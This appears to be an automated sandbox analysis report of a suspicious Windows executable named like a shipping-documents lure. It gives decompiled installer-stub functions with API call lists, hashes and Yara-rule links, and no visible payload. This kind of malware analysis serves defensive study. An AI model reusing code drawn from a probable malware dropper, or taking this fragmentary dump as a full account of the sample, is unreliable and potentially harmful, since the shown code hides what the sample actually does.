                                          0x004063f9
                                          0x004063ff
                                          0x004063ff
                                          0x0040645e
                                          0x0040645e
                                          0x00406460
                                          0x00000000
                                          0x00000000
                                          0x00406403
                                          0x0040640a
                                          0x0040640b
                                          0x0040640d
                                          0x00406427
                                          0x00406435
                                          0x0040643b
                                          0x0040643d
                                          0x0040645b
                                          0x0040645b
                                          0x0040645b
                                          0x00000000
                                          0x0040645b
                                          0x00406443
                                          0x0040644c
                                          0x0040644f
                                          0x00406455
                                          0x00406459
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406459
                                          0x0040640f
                                          0x00406412
                                          0x00000000
                                          0x00000000
                                          0x00406421
                                          0x00406423
                                          0x00406425
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406425
                                          0x00000000
                                          0x0040645e
                                          0x004063e6
                                          0x00000000
                                          0x004063a4
                                          0x004063bf
                                          0x004063c4
                                          0x004063c7
                                          0x00406467
                                          0x00406467
                                          0x0040646b
                                          0x00406473
                                          0x00406473
                                          0x00000000
                                          0x0040646b
                                          0x004063d1
                                          0x00406462
                                          0x00406462
                                          0x00406465
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406465
                                          0x004063a2
                                          0x00406375
                                          0x00406379
                                          0x00000000
                                          0x00000000
                                          0x0040637b
                                          0x0040637f
                                          0x00000000
                                          0x00000000
                                          0x00406381
                                          0x00406385
                                          0x00000000
                                          0x00406387
                                          0x00406387
                                          0x00000000
                                          0x00406387
                                          0x00406385
                                          0x004064ea
                                          0x004064f4
                                          0x00406500
                                          0x00406500
                                          0x00000000

                                          APIs
                                          • GetSystemDirectoryA.KERNEL32(uvlcopdlxoed,00000400), ref: 004063E6
                                          • GetWindowsDirectoryA.KERNEL32(uvlcopdlxoed,00000400,?,00420530,00000000,00405387,00420530,00000000), ref: 004063F9
                                          • SHGetSpecialFolderLocation.SHELL32(00405387,00000000,?,00420530,00000000,00405387,00420530,00000000), ref: 00406435
                                          • SHGetPathFromIDListA.SHELL32(00000000,uvlcopdlxoed), ref: 00406443
                                          • CoTaskMemFree.OLE32(00000000), ref: 0040644F
                                          • lstrcatA.KERNEL32(uvlcopdlxoed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                          • lstrlenA.KERNEL32(uvlcopdlxoed,?,00420530,00000000,00405387,00420530,00000000,00000000,00000000,00000000), ref: 004064C5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$uvlcopdlxoed
                                          • API String ID: 717251189-2520582795
                                          • Opcode ID: bc9471c6cf8ae6720703e8417b03b042a63b45d26e40513c79d31308c85558e4
                                          • Instruction ID: f83f29d570338ae078c2f0a770e3e6ec7f31d765c13aaba4f9587f8cbfb2a84b
                                          • Opcode Fuzzy Hash: bc9471c6cf8ae6720703e8417b03b042a63b45d26e40513c79d31308c85558e4
                                          • Instruction Fuzzy Hash: 22610071A00214AEDF209F64D984BBA3BA4EB55714F12413FE913BA2D1C37C8962CB5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406503, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00406503(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C2D(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405BEB("*?|<>/\":", _t5))) == 0) {
							E00405D7C(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                          0x00406505
                                          0x0040650d
                                          0x00406521
                                          0x00406521
                                          0x00406527
                                          0x00406534
                                          0x00406534
                                          0x00406535
                                          0x00406537
                                          0x0040653b
                                          0x0040653d
                                          0x00406546
                                          0x00406548
                                          0x00406562
                                          0x0040656a
                                          0x0040656a
                                          0x0040656f
                                          0x00406571
                                          0x00406573
                                          0x00406577
                                          0x00406578
                                          0x0040657b
                                          0x00406583
                                          0x00406585
                                          0x00406589
                                          0x00000000
                                          0x00000000
                                          0x0040658f
                                          0x00406594
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406594
                                          0x00406599

                                          APIs
                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\202139769574 Shipping Documents.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040655B
                                          • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406568
                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\202139769574 Shipping Documents.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040656D
                                          • CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040657D
                                          Strings
                                          • *?|<>/":, xrefs: 0040654B
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406504
                                          • "C:\Users\user\Desktop\202139769574 Shipping Documents.exe" , xrefs: 0040653F
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: "C:\Users\user\Desktop\202139769574 Shipping Documents.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 589700163-2164009476
                                          • Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                          • Instruction ID: ed4a40943fe5e2665a2a55f9ea129fd4e03433fedea2fb13391fe05f183277a3
                                          • Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                          • Instruction Fuzzy Hash: 5511E26180479139EB3216386C44B77BFD84B577A0F19007FE9C2722CAD67C5C62826D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404313, Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00404313(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                          0x00404325
                                          0x004043db
                                          0x00000000
                                          0x004043db
                                          0x00404336
                                          0x0040433a
                                          0x00000000
                                          0x00404354
                                          0x00404354
                                          0x0040435d
                                          0x00000000
                                          0x00000000
                                          0x0040435f
                                          0x0040436b
                                          0x0040436e
                                          0x0040436e
                                          0x00404374
                                          0x0040437a
                                          0x0040437a
                                          0x00404386
                                          0x0040438c
                                          0x00404393
                                          0x00404396
                                          0x00404399
                                          0x0040439b
                                          0x0040439b
                                          0x004043a3
                                          0x004043a9
                                          0x004043a9
                                          0x004043b3
                                          0x004043b8
                                          0x004043bb
                                          0x004043c0
                                          0x004043c3
                                          0x004043c3
                                          0x004043d3
                                          0x004043d3
                                          0x00000000
                                          0x004043d6

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                          • Instruction ID: 4ebf73092ad7484045a31fabae3cd442355fcbc25dfc518f848a7595e5b54366
                                          • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                          • Instruction Fuzzy Hash: 592165716007049BCB309F68E948B5BBBF8AF41710B05892EED96E26E0D774E814CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040534F, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040534F(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423f24; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x424814;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062BB(0, _t39, 0x420530, 0x420530, _a4);
					}
					_t26 = lstrlenA(0x420530);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423f08, 0x420530);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x420530;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x420530)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x420530, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                          0x00405355
                                          0x00405361
                                          0x00405364
                                          0x0040536a
                                          0x00405376
                                          0x00405379
                                          0x0040537c
                                          0x00405382
                                          0x00405382
                                          0x00405388
                                          0x00405390
                                          0x00405393
                                          0x004053b0
                                          0x004053b4
                                          0x004053bd
                                          0x004053bd
                                          0x004053c7
                                          0x004053d0
                                          0x004053dc
                                          0x004053e3
                                          0x004053e7
                                          0x004053ea
                                          0x004053fd
                                          0x0040540b
                                          0x0040540b
                                          0x0040540f
                                          0x00405411
                                          0x00405414
                                          0x00000000
                                          0x00405414
                                          0x00405395
                                          0x0040539d
                                          0x004053a5
                                          0x004053ab
                                          0x00000000
                                          0x004053ab
                                          0x004053a5
                                          0x00405393
                                          0x0040541e

                                          APIs
                                          • lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                          • lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                          • lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                          • SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                          • String ID:
                                          • API String ID: 2531174081-0
                                          • Opcode ID: 1758c99315444ffa8de3e4a805647494e46ff97573bb8ff712cd1a67f4e860c0
                                          • Instruction ID: d7aab4fbb83e072b647ad5d9ecd44a72e262910ab30c50883f082c619406a612
                                          • Opcode Fuzzy Hash: 1758c99315444ffa8de3e4a805647494e46ff97573bb8ff712cd1a67f4e860c0
                                          • Instruction Fuzzy Hash: 54218171900118BBDB11AF95DD84ADEBFB9EF04354F14807AF944B6291C7788E918F98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402E52, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00402E52(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41f904; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41f904 = 0;
					return _t15;
				}
				__eflags =  *0x41f904; // 0x0
				if(__eflags != 0) {
					return E0040666D(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x424750;
				if(_t6 >  *0x424750) {
					__eflags =  *0x424748;
					if( *0x424748 == 0) {
						_t7 = CreateDialogParamA( *0x424740, 0x6f, 0, E00402DBA, 0);
						 *0x41f904 = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x424814 & 0x00000001;
					if(( *0x424814 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402E36());
						return E0040534F(0,  &_v68);
					}
				}
				return _t6;
			}







                                          0x00402e5e
                                          0x00402e60
                                          0x00402e67
                                          0x00402e6a
                                          0x00402e6a
                                          0x00402e70
                                          0x00000000
                                          0x00402e70
                                          0x00402e78
                                          0x00402e7e
                                          0x00000000
                                          0x00402e81
                                          0x00402e88
                                          0x00402e8e
                                          0x00402e94
                                          0x00402e96
                                          0x00402e9c
                                          0x00402eda
                                          0x00402ee3
                                          0x00000000
                                          0x00402ee8
                                          0x00402e9e
                                          0x00402ea5
                                          0x00402eb6
                                          0x00000000
                                          0x00402ec4
                                          0x00402ea5
                                          0x00402ef0

                                          APIs
                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402E6A
                                          • GetTickCount.KERNEL32 ref: 00402E88
                                          • wsprintfA.USER32 ref: 00402EB6
                                            • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                            • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                            • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                            • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                            • Part of subcall function 0040534F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
                                            • Part of subcall function 0040534F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
                                            • Part of subcall function 0040534F: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B
                                          • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
                                          • ShowWindow.USER32(00000000,00000005), ref: 00402EE8
                                            • Part of subcall function 00402E36: MulDiv.KERNEL32(00000000,00000064,0000173C), ref: 00402E4B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                          • String ID: ... %d%%
                                          • API String ID: 722711167-2449383134
                                          • Opcode ID: bb3bd4b2b9508e1df3cc882d5ccfee83ca66d66d4289bc98e9bfc3421e5f8959
                                          • Instruction ID: 7a453c914e71352c87dd6fc4fa143b29ed4b83a6d55c3b122a6f25389f326a81
                                          • Opcode Fuzzy Hash: bb3bd4b2b9508e1df3cc882d5ccfee83ca66d66d4289bc98e9bfc3421e5f8959
                                          • Instruction Fuzzy Hash: 22018470582214E7CB61AB64EF0DAAF766CEB41745B14403BF801F21E0C7B95846CAEE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404BFF, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00404BFF(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                          0x00404c0d
                                          0x00404c1a
                                          0x00404c20
                                          0x00404c5e
                                          0x00404c5e
                                          0x00404c6d
                                          0x00404c74
                                          0x00000000
                                          0x00404c76
                                          0x00404c22
                                          0x00404c31
                                          0x00404c39
                                          0x00404c3c
                                          0x00404c4e
                                          0x00404c54
                                          0x00404c5b
                                          0x00000000
                                          0x00404c5b
                                          0x00000000

                                          APIs
                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C1A
                                          • GetMessagePos.USER32 ref: 00404C22
                                          • ScreenToClient.USER32 ref: 00404C3C
                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404C4E
                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404C74
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Message$Send$ClientScreen
                                          • String ID: f
                                          • API String ID: 41195575-1993550816
                                          • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                          • Instruction ID: 8affecd5b479f1171f5654815cc51d63bffccf6ae5a63c5c4c29235a80b14989
                                          • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                          • Instruction Fuzzy Hash: 34015E71900219BBEB00DBA4DD85FFFBBBCAF55711F10012BBA50B61D0D7B4A9418BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402DBA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E36();
					_t19 = "unpacking data: %d%%";
					if( *0x424754 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                          0x00402dc7
                                          0x00402dd5
                                          0x00402ddb
                                          0x00402ddb
                                          0x00402de9
                                          0x00402deb
                                          0x00402df7
                                          0x00402dfc
                                          0x00402dfe
                                          0x00402dfe
                                          0x00402e09
                                          0x00402e19
                                          0x00402e2b
                                          0x00402e2b
                                          0x00402e33

                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                          • wsprintfA.USER32 ref: 00402E09
                                          • SetWindowTextA.USER32(?,?), ref: 00402E19
                                          • SetDlgItemTextA.USER32 ref: 00402E2B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                          • API String ID: 1451636040-1158693248
                                          • Opcode ID: 682236bfa9d44e469b32297ddf894a90f4f99da74b05dcaaf7480c0445501217
                                          • Instruction ID: 5924424b8475f9adf48b5715c1e1f77af8692632bd00ddb5f136e7bd4fbbb8aa
                                          • Opcode Fuzzy Hash: 682236bfa9d44e469b32297ddf894a90f4f99da74b05dcaaf7480c0445501217
                                          • Instruction Fuzzy Hash: 36F01D7154020DFBEF20AF60DE0ABAE3769EB54345F00803AFA16B51D0DBB899558B99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E004027DF(void* __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405C2D(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405D9C(_t50);
				_t26 = E00405DC1(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x424758;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403419(_t45);
						E00403403(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E00403192(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405D7C( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405E68( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E00403192(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                          0x004027df
                                          0x004027e1
                                          0x004027ed
                                          0x004027f0
                                          0x004027fa
                                          0x004027fe
                                          0x004027fe
                                          0x00402804
                                          0x00402811
                                          0x00402819
                                          0x0040281c
                                          0x00402822
                                          0x00402830
                                          0x00402835
                                          0x00402839
                                          0x0040283c
                                          0x00402845
                                          0x00402851
                                          0x00402855
                                          0x00402858
                                          0x00402862
                                          0x00402887
                                          0x00402869
                                          0x0040286e
                                          0x00402876
                                          0x0040287c
                                          0x00402881
                                          0x00402881
                                          0x0040288e
                                          0x0040288e
                                          0x0040289b
                                          0x004028a1
                                          0x004028b3
                                          0x004028b3
                                          0x004028b9
                                          0x004028b9
                                          0x004028c4
                                          0x004028c5
                                          0x004028c9
                                          0x004028cd
                                          0x004028d3
                                          0x004028d3
                                          0x004028da
